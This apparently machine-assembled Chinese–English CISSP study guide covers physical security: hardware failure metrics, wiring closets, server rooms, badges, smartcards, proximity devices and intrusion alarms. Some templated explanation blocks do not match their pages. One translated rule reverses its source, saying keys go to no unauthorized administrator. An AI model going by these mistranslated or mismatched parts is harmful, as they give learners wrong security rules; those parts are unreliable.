电缆锁用于通过增加盗窃难度来保护小型设备和器材。 由于大多数便携 式系统由薄金属和塑料制成,电缆锁通常不是不可穿透的安全装置。 然而, 窃贼会因担心在试图典当或出售该设备时,强行将电缆锁从安全/锁槽中拆除 所造成的损坏过于明显而不敢偷走带有电缆锁的设备。 设备故障 为应对设备故障做准备可以采取多种形式。 在一些非关键任务场景中,了解在 48小时更换时间内如何采购替换部件就已足够。 而在其他情况下,则必须保持 现场替换部件的储备。 请记住,系统恢复至完全正常运行状态的响应时间与维 持此类解决方案所涉及的成本成正比。 成本包括存储、 运输、预先采购,以及维持现场安装和恢复的专业能力。 在某些情况下,保 持替换部件在现场不可行。 此时,与硬件供应商签订服务水平协议(SLA) 至关重要。 SLA 明确界定了在设备故障紧急情况下供应商将提供的响应时间。 设备故障是导致可用性丧失的常见原因。 在决定维持可用性的策略时,通常重 要的是了解每个资产和业务流程的关键性,以及相关的允许中断窗口(AIW)、 服务交付目标(SDO)和最大可容忍停机时间/中断(MTD/MTO)(详见第3 章和第18章了解这些概念)。

这些范围、边界和目标有助于聚焦于必要的策略, 以维持可用性,或在优化成本效率的同时最小化停机时间。 应安排老化硬件的更换和/或维修。 此类操作的安排应基于为每台设备建立的平 均故障时间(MTTF)和平均修复时间(MTTR)估算值,或遵循组织在管理 硬件生命周期方面的最佳实践。 MTTF是指在特定运行环境下设备的预期典型 使用寿命。 请确保在所有设备的MTTF到期前安排更换。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 10 / PDF P665

第 665 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

to be replaced before their MTTF expires. MTTR is the average length of time required to perform a repair on the device. A device can often undergo numerous repairs before a catastrophic failure is expected. An additional measurement is that of the mean time between failures (MTBF). This estimates the time between the first and any subsequent failures. If the MTTF and MTBF values are the same or fairly similar, manufacturers often only list the MTTF to represent both values. When a device is sent out for repairs, you need to have an alternate solution or a backup device to fill in for the duration of the repair.

Often, waiting until a minor failure occurs before a repair is performed is satisfactory, but waiting until a complete failure occurs before replacement is an unacceptable security practice. Wiring Closets A cable plant management policy defines a facility's physical structure and deployment of network cabling and related devices. A cable plant is the collection of interconnected cables and intermediary devices (such as crossconnects, patch panels, and switches) that establish the physical network.

Elements of a cable plant include the following: Entrance facility: The demarcation point or main distribution frame (MDF) is the entrance point to the building where the cable from the provider connects the internal cable plant. Equipment room: This is the main wiring closet for the building, often connected to or adjacent to the entrance facility. Backbone distribution system: This provides wired connections between the equipment and telecommunications rooms, including cross-floor connections. Wiring closet: This serves the connection needs of a large building's floor or section by providing space for networking equipment and cabling systems.

It also serves as the interconnection point between the backbone and horizontal distribution systems. The wiring closet is also known as the premises wire distribution room, main distribution frame (MDF), intermediate distribution frame (IDF), and telecommunications room. Horizontal distribution system: This connects the telecommunications room and work areas, often including cabling, cross-connection blocks,

中文直译 / 整理

在MTTF到期前更换设备。 MTTR是指对设备进行维修所需的平均时间。 在预 期发生灾难性故障之前,设备通常可经历多次维修。 另一个衡量指标是平均故 障间隔时间(MTBF),它估算的是首次故障与后续任何一次故障之间的时间 间隔。 如果MTTF和MTBF值相同或非常接近,制造商通常仅列出MTTF以代 表这两个值。 当设备被送去维修时,您需要在维修期间有一个替代方案或备用设备来顶替。 通常,在发生轻微故障后再进行维修是可以接受的,但在发生完全故障后才进 行更换是一种不可接受的安全做法。 配线间 缆线系统管理策略定义了设施的物理结构以及网络缆线和相关设备的部署。 缆线系统是指相互连接的缆线和中间设备(如交叉连接、配线架和交换机) 的集合,用于建立物理网络。 缆线系统的组成部分包括以下内容: 入口设施:分界点或主配线架(MDF)是建筑物的入口点,服务提供 商的缆线在此处连接至内部缆线系统。 设备间:这是建筑物的主要配线间,通常与入口设施相连或相邻。 主干分布系统:此系统提供之间的有线连接 设备和电信房间,包括跨楼层连接。

配线间:此房间为大型建筑的楼层或区域提供网络设备和布线系统的 安装空间,以满足其连接需求,同时也是主干系统与水平分布系统之间的 互连点。 配线间也称为建筑物布线分配室、主配线架(MDF)、中间配线 架(IDF)和电信房间。 水平分布系统:此系统连接电信间和工作区,通常包括电缆、交叉连接块

小白解释

场景先行:你是公司的安全负责人,正在读第 665 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 665 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
学习单元 11 / PDF P666

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

patch panels, and supporting hardware infrastructure (such as cable trays, cable hangers, and conduits). Protected cable distribution or protective distribution systems (PDSs) are how cables are protected against unauthorized access or harm. The goals of PDSs are to deter violations, detect access attempts, and otherwise prevent compromise of cables. Elements of PDS implementation can include protective conduits, sealed connections, and regular human inspections. Some PDS implementations require intrusion or compromise detection within the conduits.

Wiring closets or equipment rooms are commonly used to house and manage the wiring for many other important elements of a building, including alarm systems, circuit breaker panels, telephone punch-down blocks, wireless access points, telephone services, and video systems, including security cameras. Cable plant security is fundamental. Most of the security for a facility focuses on preventing physical unauthorized access. If an unauthorized intruder gains access to the area, they may be able to steal equipment, pull or cut cables, or even plant a listening device.

Thus, the security policy for the building should include a few ground rules, such as the following: Never use a wiring closet or equipment room as a general storage area. Have adequate locks, which might include biometric elements. Keep the area tidy. Do not store flammable items in the area. Set up video surveillance to monitor activity inside the wiring closet. Use a door-open sensor to log entries. Do not give keys to anyone except the authorized administrator. Perform regular physical inspections of the wiring closet's security and contents.

Include the entire cable plant in the organization's environmental management and monitoring processes to ensure appropriate environmental control and monitoring, as well as to detect damaging conditions such as flooding or fire.

中文直译 / 整理

配线架以及支持性硬件基础设施(如电缆托架、电缆吊架和管道)。 受保护的电缆布线或保护性布线系统(PDS)用于防止电缆遭受未授权访问 或损害。 PDS的目标是威慑违规行为、检测访问尝试,并以其他方式防止电 缆被破坏。 PDS的实施要素可包括保护性管道、密封连接和定期人工检查。 某些PDS实施需要在管道内实现入侵或破坏检测。 配线间或设备室通常用于容纳和管理建筑物中许多其他重要元素的布线,包括 报警系统、断路器面板、电话打线块、无线接入点、电话服务和视频系统,包 括安防摄像头。 电缆布线安全至关重要。 设施的大部分安全措施都集中在防止物理未授权访问 上。 如果未经授权的入侵者进入该区域,他们可能窃取设备、拉拽或切断电缆, 甚至安装窃听装置。 因此,建筑物的安全政策应包含一些基本规则,例如: 切勿将配线间或设备室用作通用存储区。 应配备足够的锁具,可能包括生物识别元素。 保持区域整洁。 切勿在区域内存放易燃物品。 设置视频监控以监视配线间内的活动。 使用门禁传感器记录出入情况。 请勿将钥匙交给任何未经授权的管理员。 定期对配线间的安全状况和内部物品进行物理检查。

将整个电缆系统纳入组织的环境管理和监控流程中,以确保适当的环 境控制和监控,并检测洪水或火灾等破坏性状况。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 12 / PDF P667

第 667 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

It is also essential to notify your building management of your cable plant security policy and access restrictions. Doing so will further reduce unauthorized access attempts. Server Rooms/Data Centers Server rooms, data centers, communications rooms, server vaults, and IT closets are enclosed, restricted, and protected rooms where your missioncritical servers and network devices are housed. A server room is often configured as a lights-out area, which is generally designed to improve efficiency. A server room is often not optimized for workers but for housing equipment.

Data centers can include gas-based halon-substitute oxygendisplacement fire detection and extinguishing systems, walls with a one-hour minimum fire rating, low temperatures, and little or no lighting (i.e., a lightsout area). Server rooms should be designed to support the optimal operation of the IT infrastructure and to block unauthorized human access or intervention. Server rooms should be located at the core of the building. Avoid locating the data center on the ground floor, top floor, and basement whenever possible. The server room should also be located away from water, gas, and sewage lines.

These pose too large a risk of leakage or flooding, which can cause serious damage and downtime. For many organizations, their data center and their server room are one and the same. For some organizations, a data center is an external location used to house the bulk of their backend computer servers, data storage equipment, and network management equipment. This could be a separate building near the primary offices, or it could be a remote location. A data center might be owned and managed exclusively by your organization, or it could be a leased service from a data center provider (such as a cloud service provider (CSP) or colocation center).

A data center could be a single-tenant configuration or a multitenant configuration. In many data centers and server rooms, a variety of technical controls are employed as access control mechanisms to manage physical access. These include but are not limited to smart/dumb cards, proximity devices and readers biometrics, intrusion detection systems (IDSs) (focusing on physical intruders), and a design based on in-depth defense. Smartcards and Badges

中文直译 / 整理

还必须将您的电缆系统安全策略和访问限制通知您的楼宇管理部门。 这样 做将进一步减少未经授权的访问尝试。 服务器机房/数据中心 服务器机房、数据中心、通信机房、服务器保险库和IT储藏室是封闭、受限制 且受保护的房间,用于存放您的关键任务服务器和网络设备。 服务器机房通常 配置为无人值守区域,一般设计用于提高效率。 服务器机房通常并非为工作人 员优化,而是为容纳设备而设计。 数据中心可包括基于气体的哈龙替代品氧气 置换火灾探测和灭火系统、至少一小时耐火等级的墙体、低温以及极少或无照 明(即无人值守区域)。 服务器机房应设计为支持IT基础设施的最优运行,并 阻止未经授权的人为访问或干预。 服务器机房应位于建筑物的核心区域。 尽可能避免将数据中心设在底层、顶层 或地下室。 服务器机房还应远离水管、燃气管和污水管。 这些管道存在泄漏或 淹水的高风险,可能导致严重损坏和停机。 对于许多组织而言,其数据中心和服务器机房是同一场所。 对于某些组织而言, 数据中心是用于存放大部分后端计算机服务器、数据存储设备和网络管理设备 的外部场所。 这可能是一个靠近主要办公地点的独立建筑,也可能是一个远程 位置。

数据中心可能由您的组织独家拥有和管理,也可能是一种从数据中心提 供商(如云服务提供商(CSP)或托管中心)租赁的服务。 数据中心可以是单 租户配置,也可以是多租户配置。 在许多数据中心和服务器机房中,采用多种技术控制措施作为访问控制机制来 管理物理访问。 这些措施包括但不限于智能卡/普通卡、近距设备和读卡器、 生物识别技术、入侵检测系统(IDS)(侧重于物理入侵者),以及基于纵深 防御的设计。 智能卡和徽章

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

政策:政策是高层原则,说明必须遵守什么。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 667 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Policy 高层、强制、稳定;Procedure 具体步骤。

检测是 IDS,主动阻断更像 IPS。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
政策 政策是高层原则,说明必须遵守什么。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
学习单元 13 / PDF P668

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Badges, identification cards, and security IDs are forms of physical identification and/or electronic access control devices. A badge can be as simple as a name tag indicating whether you are a valid employee or a visitor (sometimes called a “dumb card”). Or it can be as complex as a smartcard or token device that employs multifactor authentication (MFA) to verify and prove your identity and provide authentication and authorization to access a facility, specific rooms, or secured workstations.

Badges may be color-coded by facility or classification level, and they often include pictures, magnetic stripes, QR codes or bar codes for optical decoding, smartcard chips, RFID, NFC, and personal details to help a security guard verify identity. Smartcards are credit card–sized IDs, badges, or security passes with an embedded magnetic stripe, bar code, or integrated circuit chip. They contain information about the authorized bearer that can be used for identification and/or authentication purposes. Some smartcards can even process information or store reasonable amounts of data in a memory chip.

Several phrases or terms may be used when referring to a smartcard: An identity token containing integrated circuits (ICs) A processor IC card An IC card with an ISO 7816 interface (Figure 10.1)

中文直译 / 整理

徽章、身份证和安全识别卡是物理识别和/或电子访问控制设备的形式。 徽章 可以简单到只是一个标明你是有效员工还是访客的姓名牌(有时称为“普通卡”); 也可以复杂到采用多因素认证(MFA)来验证和证明你的身份,并提供访问设 施、特定房间或安全工作站的认证和授权的智能卡或令牌设备。 徽章可能根据 设施或分类级别进行颜色编码,通常包含照片、磁条、二维码或条形码以供光 学解码、智能卡芯片、RFID、NFC以及个人信息,以帮助安保人员核实身份。 智能卡是信用卡大小的身份证、徽章或安全通行证,内置磁条、条形码或集 成电路芯片。 它们包含有关授权持有者的信息,可用于身份识别和/或认证目 的。 一些智能卡甚至可以在内存芯片中处理信息或存储相当数量的数据。 在 提及智能卡时,可能会使用以下几种术语或短语: 一种包含集成电路(IC)的身份令牌 处理器IC卡 带有ISO7816接口的图10.1的IC卡

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

ISO 偏标准和管理体系。

检测是 IDS,主动阻断更像 IPS。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
身份 身份是主体在系统中的标识。
多因素认证 MFA 使用至少两类不同认证因素,提高认证可信度。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 14 / PDF P669

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

FIGURE 10.1 A smartcard's ISO 7816 interface Smartcards are often viewed as a reliable security solution, but they should not be considered complete by themselves. Smartcards represent a “something you have” authentication factor. Like any single security mechanism, smartcards are subject to weaknesses and vulnerabilities. Smartcards can fall prey to physical, logical, Trojan horse, or social engineering attacks. In most cases, a smartcard is used in a multifactor configuration. Thus, theft or loss of a smartcard does not result in easy impersonation.

Smartcards can serve dual (or multiple) purposes, such as gaining access to a facility just by waving the card near a wall-mounted reader or gaining access to a computer system by inserting the card into a reader (which is usually followed by a prompt for a personal identification number [PIN] or other authentication factor—i.e., MFA). Magnetic stripe cards are machine-readable ID cards with a magnetic stripe. Like a credit card, debit card, or ATM card, magnetic stripe cards can retain a small amount of data but are unable to process data like a smartcard.

中文直译 / 整理

图10.1智能卡的ISO 7816接口 智能卡通常被视为一种可靠的安全部署方案,但不应将其视为独立完整的解决 方案。 智能卡代表一种“你所拥有的”身份验证因素。 与任何单一的安全机制 一样,智能卡也存在弱点和漏洞。 智能卡可能遭受物理攻击、逻辑攻击、木马 攻击或社会工程学攻击。 在大多数情况下,智能卡被用于多因素配置。 因此, 即使智能卡被盗或丢失,也不会导致轻易冒充身份。 智能卡可以实现双重(或 多重重)用途,例如只需将卡靠近墙载式读卡器即可进入设施,或通过将卡插 入读卡器(通常随后会提示输入个人识别码 [PIN] 或其他身份验证因素——即 多因素认证 MFA)来访问计算机系统。 磁条卡是一种带有磁条的机器可读身份证卡。 与信用卡、借记卡或ATM卡类 似,磁条卡可以存储少量数据,但无法像智能卡那样处理数据。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

身份:身份是主体在系统中的标识。

多因素认证:MFA 使用至少两类不同认证因素,提高认证可信度。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

ISO 偏标准和管理体系。

身份管理题要区分识别、认证、授权、审计。

知道的、拥有的、固有的、所处位置、行为特征是常见因素。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
身份 身份是主体在系统中的标识。
多因素认证 MFA 使用至少两类不同认证因素,提高认证可信度。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 15 / PDF P670

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Magnetic stripe cards often function as a type of two-factor control: the card is “something you have” and its PIN is “something you know.” However, magnetic stripe cards are easy to copy or duplicate and are insufficient for authentication purposes in a secure environment. A badge can be used either for identification or for authentication. When a badge is used for identification, it is swiped by a device, and then the badge owner must provide one or more authentication factors, such as a password, passphrase, or biological trait (if a biometric device is used).

When a badge is used for authentication, the badge owner provides an ID, username, and so on and then swipes the badge to authenticate. When an employee is terminated or otherwise departs the organization, badges should be retrieved and destroyed as part of the offboarding process. Facility security may require that each authorized person wear badges in plain view. Badges should be designed with security features to minimize the ability of intruders to replicate or duplicate. Day passes and/or visitor badges should be clearly marked as such with bright colors for easy recognition from a distance, especially for escort-required visitors.

Proximity Devices In addition to smartcards, proximity devices can be used to control physical access. A proximity device can be a passive device, a field-powered device, or a transponder. The proximity device is worn or held by the authorized bearer. When it passes near a proximity reader, the reader device is able to determine who the bearer is and whether they have authorized access. The passive proximity device has no active electronics; it is just a small magnet with specific properties (like antitheft devices commonly found in or on retail product packaging). A passive device reflects or otherwise alters the electromagnetic (EM) field generated by the reader device.

This alteration is detected by the reader device, which triggers the alarm, records a log event, or sends a notification. A field-powered proximity device has electronics that activate when the device enters the EM field that the reader generates. Such devices generate electricity from an EM field to power themselves (such as card readers that only require the access card to be waved within inches of the reader to unlock doors). This is effectively radio-frequency identification (RFID); see Chapter 11, “Secure Network Architecture and Components,” for more.

中文直译 / 整理

磁条卡通常用作一种双因素控制:卡片是“您所拥有的东西”,而其PIN码是 “您所知道的东西”。 然而,磁条卡容易被复制或仿制,在安全环境中不足 以用于身份验证。 徽章可用于身份识别或身份验证。 当徽章用于身份识别时,设备会刷卡,然后 徽章持有者必须提供一个或多个身份验证因素,例如密码、口令或生物特征 (如果使用生物识别设备)。 当徽章用于身份验证时,徽章持有者提供ID、用 户名等信息,然后刷卡以完成验证。 当员工被解雇或以其他方式离开组织时,应在离职流程中回收并销毁徽章。 设 施安全可能要求每位授权人员将徽章佩戴在显眼位置。 徽章应设计有安全功能, 以最大限度地减少入侵者复制或仿制的可能性。 日通行证和/或访客徽章应使用 醒目的颜色明确标注,以便从远处轻松识别,特别是对于需要陪同的访客。 近距设备 除了智能卡之外,近距设备也可用于控制物理访问。 近距设备可以是无源设备、 场供电设备或应答器。 近距设备由授权持有者佩戴或手持。 当其靠近近距读卡 器时,读卡器能够识别持有者身份并判断其是否具有授权访问权限。 该无源近距设备没有有源电子元件; 它只是一个具有特定特性的小型磁铁(如 零售产品包装中常见的防盗装置)。

无源设备会反射或以其他方式改变读取设 备产生的电磁(EM)场。 这种改变会被读取设备检测到,从而触发警报、记录 日志事件或发送通知。 A 由磁场供电的近距设备在设备进入读卡器产生的电磁场时,其电子元件会被 激活。 此类设备通过电磁场产生电能以自供电(例如,仅需将访问卡在读卡器 数英寸范围内挥动即可解锁门的读卡器)。 这实际上是射频识别(RFID); 详 见第11章“安全网络架构与组件”。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 16 / PDF P671

第 671 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

A transponder proximity device is self-powered and transmits a signal received by the reader. This can occur consistently or only at the press of a button (like a garage door opener or car alarm key fob). Such devices may have batteries or capacitors, or may even be solar-powered. Automatic Request to Exit (AREX) is a security system feature commonly employed in access control systems to automatically signal to unlock a secured door or gate when someone wishes to exit a protected area. This feature enhances security and convenience by automating the exit process. An AREX system typically involves proximity sensors or devices installed near exit points.

These devices can include motion detectors, infrared sensors, pressure-sensitive mats, or other technologies that can detect when someone is approaching the exit. Intrusion Detection Systems Intrusion detection systems (IDSs) are automated or manual systems designed to detect an attempted physical intrusion, breach, or attack, the use of an unauthorized entry, or the occurrence of some specific event at an unauthorized or abnormal time. Intrusion detection systems used to monitor physical activity may include security guards, automated access controls, motion detectors, and other specialty monitoring techniques.

See Chapter 17, “Preventing and Responding to Incidents,” for a discussion of the different type of IDS that is a logical/technical control related to network or host breaches. Physical intrusion detection systems, also called burglar alarms, detect unauthorized activities and notify the authorities (internal security or external law enforcement). The most common type of system uses a simple circuit dry contact switch at entrance points to detect when a door or window has been opened. Some windows may include an internal wire grid or a surface-mounted foil strip that detects when the glass has been broken.

Some systems may even use a light beam–based tripwire mechanism to detect entry into a controlled area. This is similar to the safety mechanism located at the bottom of most automatic garage doors. All of these are examples of perimeter breach detection methods. Most IDSs or burglar alarm systems will include both perimeter breach and internal motion-detection methods (see

中文直译 / 整理

一个应答器近距设备是自供电的,并向读卡器发送信号。 这种传输可以持续 发生,也可以仅在按下按钮时触发(如车库门开启器或汽车警报遥控钥匙)。 此类设备可能配备电池或电容器,甚至可能是太阳能供电的。 自动出口请求(AREX)是门禁系统中常用的一种安全系统功能,用于 在有人希望离开受保护区域时自动发出信号以解锁安全门或闸门。 该功能 通过自动化出口过程,提升了安全性和便利性。 AREX系统通常在出口点附 近安装有接近传感器或设备。 这些设备可包括运动探测器、红外传感器、 压力感应垫或其他能够检测到有人接近出口的技术。 入侵检测系统 入侵检测系统(IDS) 是自动或手动设计的系统,用于检测试图进行物理入侵、 突破或攻击、未经授权的入口使用,或在未经授权或异常时间发生某些特定事 件。 用于监控物理活动的入侵检测系统可能包括安保人员、自动门禁控制、运 动探测器及其他专用监控技术。 有关与网络或主机突破相关的逻辑/技术控制类 型的IDS的讨论,请参见第17章,“事件的预防与响应”。 物理入侵检测系统,也称为防盗报警器,可检测未经授权的活动并通知相关部 门(内部安保或外部执法机构)。

